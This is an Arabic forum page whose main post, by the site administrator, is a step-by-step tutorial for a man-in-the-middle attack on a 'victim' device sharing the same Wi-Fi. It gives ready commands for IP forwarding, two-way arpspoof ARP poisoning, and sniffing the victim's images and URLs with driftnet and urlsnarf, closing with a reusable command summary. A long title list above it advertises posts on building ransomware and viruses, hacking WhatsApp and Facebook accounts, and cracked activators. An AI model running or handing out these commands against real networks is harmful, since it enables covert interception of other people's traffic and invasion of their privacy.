أفضل جروبات التليجرام لتعلم البرمجة وقواعد البيانات والشبكات   موقع W3schools عملاق تعلم البرمجة - كامل بدون أنترنت   العالم ما وراء التقليدي "ميتافيرس" (كتاب باللغة العربية)   كتاب التسويق الإلكترونى Arts Of E-Marketing من الألف إلى الياء   أداة تفعيل وتنشيط جميع أصدارت الويندز وميكروسوفت أوفيس 2022   جميع أصدارات الوندوز والأوفيس بروابط مباشرة من موقعها الأصلي   تعرف على الفرق بين تقنيات HD و FHD و HDR و 4K   كيف تحصل على تفعيل كامل لنظام الويندوز 10 مقابل 7.43$ فقط!   لعبة ببجي (PUBG) للحاسوب متاحة الآن مجاناً   7 خصائص في برنامج Zoog VPN لفك المواقع المحظورة ستعجبك كثيراً   تعرف على Windscribe .. برنامج VPN ومانع إعلانات إحترافي في آن واحد   موبايلك أتسرق وبتتصل بيه مغلق ؟ تجربة حقيقية من مصر ..   سبعة أكاذيب تمنعك من تعلم البرمجة   لو باقة الأنترنت المنزلي مش بتكمل معاك الشهر .. أليك الحل ..   أزاى تبحث فى جوجل صح .. إليك بعض النصائح للبحث   واحده من أكبر عمليات الأختراق الـ حصلت في التاريخ   كتاب إحترف كاميرات المراقبة في 6 ساعات   الفيلم الوثائقى لقصة حياة ستيف جوبز .. مؤسس شركة أبل   الفيلم الوثائقى لقصة حياة مارك زوكربيرج .. مؤسس موقع الفيسبوك   الفيلم الوثائقى لقصة حياة بيل جيتس .. مؤسس شركة ميكروسوفت   مجموعة ضخمة من الخطوط 4000 خط من الخطوط العربية والأنجليزية   ازاي تبقي محترف فـ Cyber Security وانت بتدرس او بتشتغل ؟   أفضل المواقع للمبرمجين - مشاريع مفتوحة المصدر   صور من أول نسخة للويندوز فى التاريخ النسخة v1.0 - v2.0   لو اي حد بيبتزك او بيتحرش بيك اونلاين او بيهددك بصور .. أعمل الصح   التجسس على الشخص من خلال سماعات البلوتوث !! حقيقة   تجربة ويندوز 95 و ويندوز 98 أون لاين .. يلا نرجع أيام الزمن الجميل   عايز تعرف بياناتك أتسرقت ولا ـ لا - موقع على الانترنت يقدملك الاجابة   اليك أكثر من 30 سيرة ذاتية أحترافية بصيغة وورد والتحميل مجاناً   3 خطوات تجعلك أكثر آمنا عند تصفحك للأنترنت .. قم بتطبيقها حالا...   ما هي لغات البرمجة الخاصة ببرمجة الذكاء الإصطناعي ؟   حاتشتغل يعنى حاتشتغل .. أعمل اللى عليك .. وربنا حيرزقك   تجميعة بسيطة لخدع حاسوبية ممكن تصنعها ببرنامج Notpad   أزاى تبقى مبرمج أو مطور برامج محترف فى البرمجة ..   13 جملة ممكن يكونوا السبب إنك ماتعدّيش من الأنترفيو   ما الفرق بين كل من الـ VPN و الـ VPS ؟ و ما تعريف كل واحد منهما ؟   مشاهدة حلقات المسلسل Mr.Robot كاملة | المواسم الأربعة للمسلسل للتحميل   موقع يجعلك تكتب مثل الهاكرز التى فى الأفلام الأمريكية   تحميل مجانى لحقيبة المبرمج Programmer Bag مهداة من موقع أمازون   كتاب فكر كمهندس أطلق عنان أحلامك، كن مختلفاً، واستمتع   خلاصة الخلاصة في الهندسة الجتماعية ( social Engineering )   ما هو ال Keylogger ؟ وكيف تقوم هذه بالتجسس على لوحة مفاتيحك   الكابل البحري الناقل للإنترنت في المحيطات، وما هي سرعة نقل البيانات فيه ؟   ماهو هجوم الفدية او إنتزاع الفدية (Ransomware)   هل تريد أن تصبح هكر ؟ ولماذا ؟ من أين وكيف تبدأ ؟   تريد أن تتعلم البرمجة .. يبقى لازم تعرف من أين تبدأ طريقك للبرمجة   الاختراق المادي Physical hacking   الفرق بين بروتوكول TCP/IP و بروتوكول UDP   ماهي لغة ألف ؟ لغة البرمجة العربية !   ما هو الفرق بين Cyber Security و Information Security   ماذا يجب أن أتعلم لأدخل عالم الروبوتات ، وما هي لغات برمجة الروبوت؟   فحص الروابط وتحليلها للتأكد من سلامتها قبل فتحها بطرق سهلة وبسيطة   تحديد التهديدات ونقاط الضعف المتعلقة بأمن الشبكة   ماهو كود الاستجابة السريعة QR؟ وكيف يعمل؟   كتب ومقرارات وملخصات كلية الحاسبات والمعلومات الفرقة الأولى   كتب ومقرارات وملخصات كلية الحاسبات والمعلومات الفرقة الثانية   كتب ومقرارات وملخصات كلية الحاسبات والمعلومات الفرقة الثالثة   دورة تعليمية لشرح هياكل البيانات والخوارزميات بالصوت والصورة   دورة أنظمة التشغيل Operating Systems Course بالصوت والصورة   تقنية DeepFake خطورتها وآلية عملها وكيف يمكن أكتشاف التزيف !!   إدارة الحضانات التعليمية ورياض الأطفال والمدارس برنامج مجانى   برنامج أدارة المدارس والمعاهد والجامعات مجانى بالتفعيل مدى الحياة   برنامج شؤون الموظفين الذى يقوم بخدمة الموظفين في الشركات والهيئات والمؤسسات   مشروع برمجى كامل لتصميم موقع تواصل إجتماعى + السورس كود   رسم تصميم شجرة برمجياً .. بالعديد من اللغات البرمجية   برنامج مجانى وأحترافى فى إدارة شؤون الموظفين مفتوح المصدر   مشروع برمجى لتصميم موقع متكامل ومتجاوب يدعم كل شاشات العرض Gallery Images   برنامج إدارة شؤون الموظفين لإدارة الموارد البشرية في الشركات والهيئات والمؤسسات   برنامج محاسبى لإداة كاشير المطاعم والكافيهات نسخة مجانية   برنامج لإدارة معامل التحاليل الطبية الحديثة ومفتوح المصدر   كتاب لغة البرمجة الجافا ( الجافا سؤال وجواب )   مجموعة من الكتب التعليمية لتعليم لغة البرمجة الجافا   لعبة الثعبان البسيطة .. الكود بلغة البرمجة الجافا   لعبة بسيطة تشبة الطيور الطائرة .. مع الكود البرمجى للعبة   لعبة البلية بشكل مبسط مع الكود البرمجى للعبة   شرح تصميم واجهة أحترافية بلغة الجافا 102 + الكود وملفات العمل   شرح تصميم واجهة أحترافية بلغة الجافا 103 + الكود وملفات العمل   شرح تصميم واجهة أحترافية بلغة الجافا 104 + الكود وملفات العمل   شرح تصميم واجهة أحترافية بلغة الجافا 101 + الكود وملفات العمل   لغة الجافا ( Java ) اللغة الأشهر من بين كل لغات البرمجة .. تعرف عليها   دورة تعليمية لتعلم ( Jasper Reports ) لأنشاء التقارير بالصوت والصورة   دورة تعليمية لتعلم Jasper iReport لأنشاء التقارير لمطورين الجافا   تصميم وبرمجة برنامج للشات | بلغة الجافا + الكود   طريقة عمل لعبة الثعبان بلغة ++Snake Game in C   مجموعة من أفضل الكتب التعليمية لتعليم لغة البرمجة السى   كتاب لغة البرمجة السى سؤال وجواب   مجموعة من أفضل الكتب التعليمية لتعليم لغة البرمجة ( ++C )   مجموعة أسطوانات تعليمية لتعلم لغة ( ++C ) من البداية وحتى الأحتراف   تحميل كتاب سى شارب #C بعمق   مجموعة من أفضل الكتب لتعليم لغة السى شارب #C   كتاب سبيلك إلى تعلم لغة C#.NET + كتاب برمجة الواجهات   أقوى دورة تعليمية لتعلم لغة السى شارب #C من البداية بالصوت والصورة   برمجة برنامج لأدارة المبيعات #C وقاعدة بيانات SQL Server بالصوت والصورة   تصميم لعبة حرب طائرات بالسي شارب + السورس كود   تصميم برنامج تشفير وفك التشفير بالسي شارب #C + السورس كود   تصميم لعبة الارنب وجمع الجزر بلغة السي شارب + الكود   (00) دورة تعلم لغة البرمجة MQL5 - تعلم MQL5 ( MetaTrader5 )   ورشة عمل برمجة أكسبرت CAP Zone Recovery EA   كتاب المرجع الكامل فى تعلم لغة MQL4   التعرف على MQL5 - لغة برمجة روبوتات التداول من Metaquotes   دورة تعليمية لتعلم لغة XML بالصوت والصورة   10 أسطوانات تعليمية لتعلم لغة الفيجوال بيسك 2008 بالصوت والصورة   دورة تعليمية لبرمجة الواجهات بلغة الفيجوال بيسك بالصوت والصورة   مجموعة من الأسطوانات التعليمية لتعلم ASP.NET من البداية وحتى الأحتراف   دورة تدريبية لبرمجة موقع للتوظيف بتقنية ASP.NET MVC 5 بالصوت والصورة   مجموعة من أفضل الكتب لتعليم لغة Microsoft ( ASP.NET )   دورة تصميم المواقع الالكترونية ( HTML - CSS - PHP - JOOMLA- SEO) باللغة العربية   إنشاء موقع بالإعتماد على إطار العمل الشهير بوتستراب (Bootstrap)   مجموعة من أفضل الكتب لتعليم لغة CSS   كتاب تعلم HTML5 و CSS3 ( الخطوة الأولى نحو البرمجة للويب )   دورة تعليمية لتعلم أطار العمل Bootstrap 4 بالصوت والصورة   كتاب برمجة المتحكمات الدقيقة بلغة التجميع   أقوى دورة تعليمية لتعليم لغة الأسمبلى بالصوت والصورة   مجموعة من أفضل الكتب لتعليم لغة البرمجة أسمبلى   مشروع أدارة منتجات كامل بالجافا سكريبت | Full Product Management System   كورس مجانى للمبتدئين فى مجال البرمجة Javascript باللغة العربية بخط اليد   مشروع أحترافى ساعة رقمية وعقارب + السورس كود   أنشاء تخزين سحابي بسيط | تحميل و رفع الملفات بأستعمال PHP   أنشاء نظام كامل لتسجيل الدخول بـ PHP   مجموعة من أفضل الكتب لتعليم لغة PHPemsp;  دورة تعليمية لتعلم MVC Framework فى لغة PHP بالصوت والصورة   كتاب تعلم Flutter باللغة العربية   مجموعة أفكار مشاريع Flutter لأحتراف التطوير بها   ما هي Dart ؟ و ما هي Flutter ؟   كتاب فك الشيفرات السرية بلغة البايثون   الكود الأول لتصميم وبرمجة روبوت كصديق لك مع القابلية للتعلم بالذكاء الأصطناعى   برمجة سكربت بايثون لفحص البورتات المفتوحة و المغلقة في موقع   تحميل كتاب البرمجة بلغة بايثون   اصنع اداة nmap بنفسك لفحص عناوين الآيبي للمواقع و السيرفرات في لغة بايثون   تعلم بايثون بالكامل في فيديو واحد | كورس بايثون كامل للمبتدئين   كتاب أربعون سؤالاً لمقابلات العمل بلغة بايثون   كتاب تعلم أساسيات الأندرويد بالعربية بأستخدام Android Studio   كتاب ملخص مسار الأندرويد من مبادرة مليون مبرمج عربي   كتاب ببساطة لتعلم تطوير التطبيقات على الأندرويد   7 مكتبات أندرويد لتطوير واجهات تطبيقات الأندرويد بشكل إحترافي بكل سهولة   دورة تعليمية لتعلم برمجة تطبيقات الأندرويد على Xamarin بالصوت والصورة   كورس CS50 كامل باللغة العربية | CS50 Tutorial In Arabic   كتاب مختصر دليل لغات البرمجة   كتاب هندسة البرمجيات العصرية للمبتدئين باللغة العربية   تعلم الخوارزميات وهياكل البيانات فى 300 دقيقة   أهم مقاسات الشاشات اللي تحتاجهم لتصميم صفحات متجاوبة Responsive   كتاب البحر الشاسع لدخول الخوارزميات من بابها الواسع   أفضل الكتب التعليمية الخاصة بأغلب لغات البرمجة مع التمارين والأمثلة   أساسيات البرمجة ونصائح والذى يجب على كل مبرمج معرفتها جيداً   الفرق بين أطار العمل Framework والمكتبة Library ببساطة   مجموعة ضخمة من الأيقونات لمبرمجين تطبيقات سطح المكتب   تحميل برنامج NetBeans IDE 8.2 المحرر العملاق للبرمجة بالجافا   إعداد بيئة الجافا للبرمجة Java Development Kit ( JDK )   الدورة الشاملة في أدارة الشبكات المنزلية والمحلية من الألف إلى الياء باللغة العربية   خطوات حماية الشبكة من الهاكرز (من كواليس المحترفين)   أعداد وأختبار وتأمين بروتوكول SSH   أجهزة التشويش: كيف تعمل أجهزة التشويش على الهواتف النقالة ؟   "قناة 14" الغامضة للواي فاي - لماذا لا يمكنك استخدامها ؟   أكبر مكتبة كتب باللغة العربية لتعلم الشبكات ( 300 كتاب )   كتاب يقدم دورة تعليمية كاملة لـ ( MCITP ) باللغة العربية   مجموعة من أفضل الكتب لدراسة شهادة MCSE   مجموعة من أفضل الكتب لتعلم لغة SQL لإدارة قواعد البيانات   كتاب الشرح الوافى لتعلم لغة SQL من نبعها الصافى   الهندسة العكسية Reverse Engineering   أسطوانة تعليمية لتعلم الهندسة العكسية وكسر حماية البرامج   الأسطوانة الثانية لتعلم الهندسة العكسية وكسر حماية البرامج   كتاب الهندسة العكسية خطوة إلى الأمام   كتاب مدخل إلى الهندسة العكسية   كتاب أوبنتو ببساطة (أبدأ مع نظام أوبنتو لينكس الآن)   كتاب خطوة بخطوة لنحترف GIMP   كتاب ( برمجة وتصميم نظام تشغيل ) أساسيات بناء نظام تشغيل   مقدمة عن الـ Disk Management ( إدارة الهاردسكات )   حل مشكلة تهنيج وثقل هواتف الأندرويد   أكواد سرية في هاتفك تقوم بأشياء مهمة عليك معرفتها   4 ملفات لا يجب أن تحذفها مطلقًا من هاتف أندرويد الخاص بك وإلا ستواجه مشكلات   جرب أنظمة اللينكس كاملة من خلال المتصفح فقط ومن دون أي برامج !   كيف تتجاوز كلمة المرور فى نظام الويندوز بدون فورمات   25 أمر إذا أدخلتها في نافذة ال RUN ستدخل إلى أدوات مهمة ومخفية في حاسوبك   تجربة الإصدارات القديمة من Windows في متصفحك باستخدام المحاكي EmuOS مجانا   كيفية إزالة Internet Explorer بالكامل من نظام التشغيل Windows 10   التعامل مع نظام التشغيل Dos وكيفية برمجة الملفات الدفعية   تحميل ويندوز 10 للأجهزة الضعيفة . أخر تحديثات 2018 . بحجم صغير   حقيبة المصمم لمصممين الفوتوشوب Adobe Photoshop   أداة مجانية وآمنة لتفعيل جميع برامج ادوبى Adobe لجميع الإصدارت - مدى الحياة   دورة تعليمية أحترافية لتعلم برنامج الفوتوشوب Adobe Photoshop CS6   هل تصدق .. قصة حب وراء أختراع برنامج الفوتوشوب ( Photoshop )   أسئلة أمتحانات ICDL | Windows 7 الرخصة الدولية لقيادة الحاسب الآلى   طريقة الدخول على الدارك ويب أو الأنترنت المظلم : إليك الطريقة   روابط الغرفة الحمراء - الغرفة الحمراء   اللى أتعلم Python ومش قادر يكتب Tools تساعده في الـ Penetration Testing   كورس برمجة فيروس الفدية بأستخدام لغة البرمجة بايثون   قائمة أهم اللغات البرمجة التي يجب عليك معرفتها للولوج لعالم الهاكينغ و الإختراق   مكتبة cookiejar وكيفية عمل سكربت و حقنه لتخطي لوحة الادمن في بايثون   أشهر التوزيعات فى مجال أختراق الشبكات   عمل هجوم على بورت مفتوح Telnet بالفيديو على شبكة داخلية   8 أدوات أختراق شبكات الواى فاى على الويندوز   حل مشكلة أنقطاع الشبكة بعد أستخدام airmon-ng   هجمات قومت بيهم على أرض الواقع وصور توضيحية من الهجمة   توضيح الهجوم على الشبكة - رجل في المنتصف MITM   أستغلال الـ Reverse Shell و Reverse Tcp لـكن ماذا يعني هذا ؟!   تثبيت الميتاسبلويت على تطبيق التيرمكس بأسهل الطرق   فيروس جديد بالبايثون لعمل DDOS Attack على النظام ومسح نفسه تلقائى   كتاب الفيروسات نظرة معمقة   صنع فيروس مزعج بأستخدام بايثون وآلية عمل مكافح الفيروسات   فيروس حذف ملفات التسجيل Registry الرئيسية   طريقة صنع فيروس بسيط مدمر للويندوز في ثواني   كيف يمكن ان تكون مثل مستر روبوت MR.Robot ؟   كتاب محترف لأختراق الشبكات اللاسلكية   إخفاء جميع ملفاتك و فيديوهاتك بداخل صورة لا يتجاوز حجمها 10KB بسهولة   كيف تصنع صوتا شبيه بصوت مجموعة أنونيموس Anonymous الشهيرة   ما الفرق بين الـ Vulnerability و الـ Exploit في مجال الإختراق و الحماية ؟   مجموعة من الكتب لأختبار الأختراق والأمن والحماية   كتاب التحليل الجنائي الرقمي   كتاب أختبار أختراق سيرفرات وتطبيقات الويب   كتاب تعلم اساسيات برنامج تيرمكس Termux بالعربي للمبتدئين من الصفر   أختراق أجهزة الـ Android وأختراق الـ WhatsApp بواسطة صورة   طريقة بسيطة جدا لأختراق الواتساب بأستخدام أداة Whatapp Viewer   كيفية عمل روت لأي جهاز يعمل بنظام Android بدون جهاز كمبيوتر   فتح قفل الشاشة لهواتف الأندرويد رمز PIN بن كود | Android Pin Bruteforce Unlock   قائمة لأقوى 10 أدوات إختراق لنظام الـ Kali Linux عليك معرفتها و إحترافها   إليك أزيد من 10 توزيعات لينكس (Linux) الخاصة بإختبار الإختراق   سؤال وجواب حول طرق هكر وأختراق وتهكير الفيسبوك   أفضل 15 طريقة عمل لكيفية اختراق حسابات الفيسبوك Facebook وكيفية حمايته   مصطلحات من مسلسل MR.Robot تعرف عليها الآن   كتاب مقدمة في الأمن السيبراني   كتاب باللغة العربية فى قرصنة الحواسب الآلية وطرق تأمينها Hacking   طرق أختراق الواتس آب وحمايتك من الأختراق   بناء مختبر أختراق للتدرب على أكتشاف الثغرات وأختبار أختراق السيرفرات وتطبيقات الويب   متجر لشراء عتاد ومعدات الإختراق للقرصنة والأمن السيبراني   كتاب Manually Vulnerability Anlaysis in Web Application باللغة العربية   قصة حقيقية للهاكرز من شركة SecureWorks في مؤتمر Black Hat 7 للهاكرز   سيناريو من يوميات الهاكرز .. اقرأ وأستفيد من تفكير الهاكرز   برنامج يستطيع اختراق حساب الفيسبوك ضع الايميل ويخرج لك الباسورد   مشروع تخرج : تقنية مصائد الأختراق لمكافحة جرائم الأنترنت   سيناريو هاكر أكثر من رائع من يوميات مهندس أمن المعلومات   معرفة كلمة مرور الشبكة اللاسلكية Wi-Fi بأستخدام موجه الأوامر CMD   لو بتعمل Ping فى مختبر الأختراق وما وصل للجهاز الأخر .. اليكم الحل   جهازك اصيب بفيروس الفدية .. أليك الحل فى خطوات   تعلم برمجة وصناعة الفيروسات وأختراق وتدمير الأجهزة   برمجة فيرس لأغلاق جهاز الضحية ووضع له كلمة مرور .. لا يستطيع فتح الجهاز بعدها   أساسيات فهم الأختراق والمهارات الأساسية للهاكرز المحترف 
  1. المدير العام

    المدير العام أدارة موقع أكتب كود

    توضيح الهجوم على الشبكة - رجل في المنتصف MITM
    كيفية تنفيذ هجوم Man-in-the-middle (MITM رجل في المنتصف) باستخدام Kali Linux
    ستتعلم كيفية تنفيذ هجوم MITM على جهاز متصل في نفس شبكات Wi-Fi مثل شبكتك.
    متطلبات :
    يفترض هذا الموضوع أنك تعرف ما هي واجهة الشبكة وأنك تعرف كيفية العمل مع Kali Linux وسطر الأوامر.
    قبل البدء ، ستحتاج إلى معرفة اسم واجهة الشبكة (المثبتة على جهازك) وعنوان IP الخاص بالموجه الذي يوفر الوصول إلى Wi-Fi.
    مثال:
    كود:
    Attacker Required information Example value
    (you need to replace these values)
    Network Interface Name wlan0
    Router IP 192.000.000.1
    يمكن الحصول على اسم واجهة الشبكة بسهولة من خلال تشغيل الأمر ifconfig على محطة طرفية ، ثم انسخ اسم الواجهة التي تريد استخدامها من القائمة.
    يمكن الحصول على عنوان IP الخاص بالموجه من خلال تنفيذ عرض مسار IP على محطة ورسالة مثل "افتراضي عبر [هذا هو عنوان IP لجهاز التوجيه]".
    من الضحية ، ستحتاج فقط إلى IP (يحتاج المستخدم إلى الاتصال بالشبكة التي يوفرها جهاز التوجيه). إن عملية الحصول على عنوان IP لجهاز الضحية متروك لك تمامًا ، فهناك العديد من الطرق للتعرف عليه ، على سبيل المثال هناك برامج واجهة مستخدم موجه / بوابة بوابة تسرد جميع الأجهزة المتصلة (مع عناوين IP في القائمة) أو استخدمها فقط أداة برمجيات مراقبة الشبكة.
    كود:
    Victim Required Information Example value (you need to replace these values)
    Victim device IP 192.000.000.52
    نظرًا لأننا نخترق أنفسنا في هذه المقالة ، يمكننا بسهولة الحصول على هذه المعلومات مباشرة من أجهزتنا
    سنقوم بتنفيذ هجوم MITM على Samsung Galaxy S7 (متصل بالموجه (جهاز التوجيه (IP 192.000.000.1) مع IP 192.000.000.52) الذي يستخدم Google Chrome وسنتنقل عبر مواقع الويب المختلفة لإظهار ما إذا كان الهجوم يعمل حقًا أم لا .
    بمجرد أن تجمع كل المعلومات المطلوبة ، فلنبدأ!

    1. قم بتمكين إعادة توجيه الحزم في Linux
    أول شيء عليك القيام به هو إعادة توجيه جميع حزم شبكة IPv4.
    بهذه الطريقة سيعمل جهازك كموجه.
    نفّذ الأمر التالي في محطة جديدة :
    كود:
    sysctl -w net.ipv4.ip_forward=1
    ملحوظة
    إذا كان جهازك لا يعيد توجيه الحزم ، فسيتم تجميد اتصال المستخدم بالإنترنت وبالتالي لن يكون الهجوم مفيدًا.

    2. اعتراض الحزم من الضحية مع arpspoof
    اداة arpspoof هي أداة مساعدة لسطر الأوامر تسمح لك باعتراض الحزم على شبكة LAN مبدلة.
    يقوم بإعادة توجيه الحزم أيضًا من مضيف هدف (أو جميع المضيفين) على الشبكة المحلية المخصصة لمضيف آخر على الشبكة المحلية عن طريق تزوير ردود ARP.
    هذه طريقة فعالة للغاية لاستنشاق حركة المرور على مفتاح.

    هيكل الأمر لبدء اعتراض الحزم من الضحية إلى جهاز التوجيه هو كما يلي:
    كود:
    arpspoof -i [اسم واجهة الشبكة] -t [Victim IP] [Router IP]
    arpspoof -i [Network Interface Name] -t [Victim IP] [Router IP]
    لذلك مع قيمنا ، يجب أن يبدو الأمر كما يلي:
    الأهمية
    قم بتشغيل الأمر الخاص بك في نافذة جديدة واتركه يعمل (لا تغلقه حتى تريد إيقاف الهجوم).
    كود:
    arpspoof -i wlan0 -t 192.000.000.52 192.000.000.1
    ستراقب هذه العملية تدفق الحزم من الضحية إلى جهاز التوجيه.

    3. اعتراض الحزم من جهاز التوجيه باستخدام arpspoof
    الآن بعد أن تعترض الحزم من الضحية إلى جهاز التوجيه (يعمل على محطة طرفية) ، تحتاج الآن إلى اعتراض الحزم من الضحية إلى جهاز التوجيه باستخدام arpspoof. هيكل الأمر لبدء اعتراض الحزم من جهاز التوجيه إلى الضحية هو كما يلي:
    كود:
    arpspoof -i [اسم واجهة الشبكة] -t [Router IP] [Victim IP]
    لذلك مع قيمنا ، يجب أن يبدو الأمر كما يلي:
    الأهمية
    قم بتشغيل الأمر الخاص بك في نافذة جديدة واتركه يعمل (لا تغلقه حتى تريد إيقاف الهجوم).
    كود:
    arpspoof -i wlan0 -t 192.000.000.1 192.000.000.52
    كما ترون ، إنه نفس أمر الخطوة السابقة لكننا قمنا بتبديل امتلاك الحجج. حتى هذه النقطة ، لقد تسللت بالفعل إلى الاتصال بين ضحيتك والموجه. الآن تحتاج فقط إلى تعلم كيفية قراءة هذه الحزم باستخدام ادوات driftnet و urlsnarf.

    4. شم الصور من اتصال الضحية
    لمشاهدة الصور من المواقع التي يزورها ضحيتنا ، تحتاج إلى استخدام driftnet. Driftnet هو برنامج يستمع إلى حركة مرور الشبكة ويلتقط الصور من تدفقات TCP التي يلاحظها. ممتع للتشغيل على مضيف يرى الكثير من حركة مرور الويب.
    هيكل الأمر لبدء driftnet ورؤية الصور التي يراها المستخدم على مواقع الويب هي كما يلي:
    كود:
    driftnet -i [اسم واجهة الشبكة]
    ملحوظة
    إذا كان جهازك لا يعيد توجيه الحزم ، فسيتم تجميد اتصال المستخدم بالإنترنت وبالتالي لن يكون الهجوم مفيدًا.
    بالمعلومات التي لدينا ، يجب أن يبدو أمرنا كما يلي:
    كود:
    driftnet -i wlan0
    5. شم معلومات عناوين المواقع من الضحية navigation
    للحصول على معلومات حول المواقع التي يزورها ضحيتنا ، يمكنك استخدام urlsnarf لذلك. إنها أداة سطر أوامر تستنشق طلبات HTTP بتنسيق السجل العام. يقوم بإخراج جميع عناوين URL المطلوبة التي تم استنشاقها من حركة مرور HTTP في CLF (تنسيق السجل العام ، الذي تستخدمه جميع خوادم الويب تقريبًا) ، وهو مناسب للمعالجة اللاحقة في وضع عدم الاتصال باستخدام أداة تحليل سجل الويب المفضلة لديك (التناظرية ، wwwstat ، إلخ). هيكل الأمر الخاص بشم عناوين URL التي يزورها الضحية هو كما يلي:
    كود:
    urlsnarf -i [اسم واجهة الشبكة]
    في هذه الحالة ، مع المعلومات المتوفرة لدينا ، سيبدو الأمر المراد تنفيذه كما يلي:
    ملحوظة
    إذا كان جهازك لا يعيد توجيه الحزم ، فسيتم تجميد اتصال المستخدم بالإنترنت وبالتالي لن يكون الهجوم مفيدًا.
    كود:
    urlsnarf -i wlan0
    تهانينا ، إذا اتبعت جميع الخطوات بعناية ، فيجب أن تستنشق الآن المعلومات حول الهدف الذي اخترته بهجوم MITM. بمجرد زيارة ضحيتك لموقع ويب ، يجب أن تكون قادرًا على قراءة معلومات حول أفعاله على الإنترنت. لإيقاف الهجوم ، اضغط على CTRL + C في كل محطة حيث يتم تشغيل أي عملية قمت بفتحها.

    6. تعطيل إعادة توجيه الحزمة (فقط عندما ينتهي هجومك)
    بمجرد الانتهاء من هجومك (لا ترغب في الشم بعد الآن) ، تذكر تعطيل إعادة توجيه الحزمة في النظام مرة أخرى بتنفيذ الأمر التالي على الجهاز الطرفي:
    كود:
    sysctl -w net.ipv4.ip_forward = 0
    ملخص
    إذا كنت قد اتبعت بالفعل البرنامج التعليمي ، فقد فعلت كل شيء بشكل صحيح وعمل كما هو متوقع ، ثم اتبع ملخص العملية في المرة التالية التي تريد فيها القيام بذلك :
    كود:
    # Enable port forwarding
    sysctl -w net.ipv4.ip_forward=1
    # Spoof connection between Victim and Router
    # Note: Run this command in a new terminal and let it running
    arpspoof -i [Network Interface Name] -t [Victim IP] [Router IP]
    # Same step but inverted (nope, it's not the same ...)
    # Note: Run this command in a new terminal and let it running
    arpspoof -i [Network Interface Name] -t [Router IP] [Victim IP]
    # Execute driftnet to sniff images
    # Note: Run this command in a new terminal and let it running
    driftnet -i [Network Interface Name]
    # Sniff URL traffic of the victim
    # Note: Run this command in a new terminal and let it running
    urlsnarf -i [Network Interface Name]
    # Disable port forwarding once you're done with the attack
    sysctl -w net.ipv4.ip_forward=0
    # Examples for values
    # [Network Interface Name] = wlan0
    # [Victim IP] = 192.000.xx
    # [Router IP] = 192.000.1
    [​IMG]
     
جاري تحميل الصفحة...
المشاركات المتشابهة - توضيح الهجوم على
  1. المدير العام
    الردود:
    0
    المشاهدات:
    370
  2. المدير العام
    الردود:
    0
    المشاهدات:
    618
  3. المدير العام
    الردود:
    0
    المشاهدات:
    545
  4. المدير العام
    الردود:
    0
    المشاهدات:
    691
  5. المدير العام
    الردود:
    0
    المشاهدات:
    252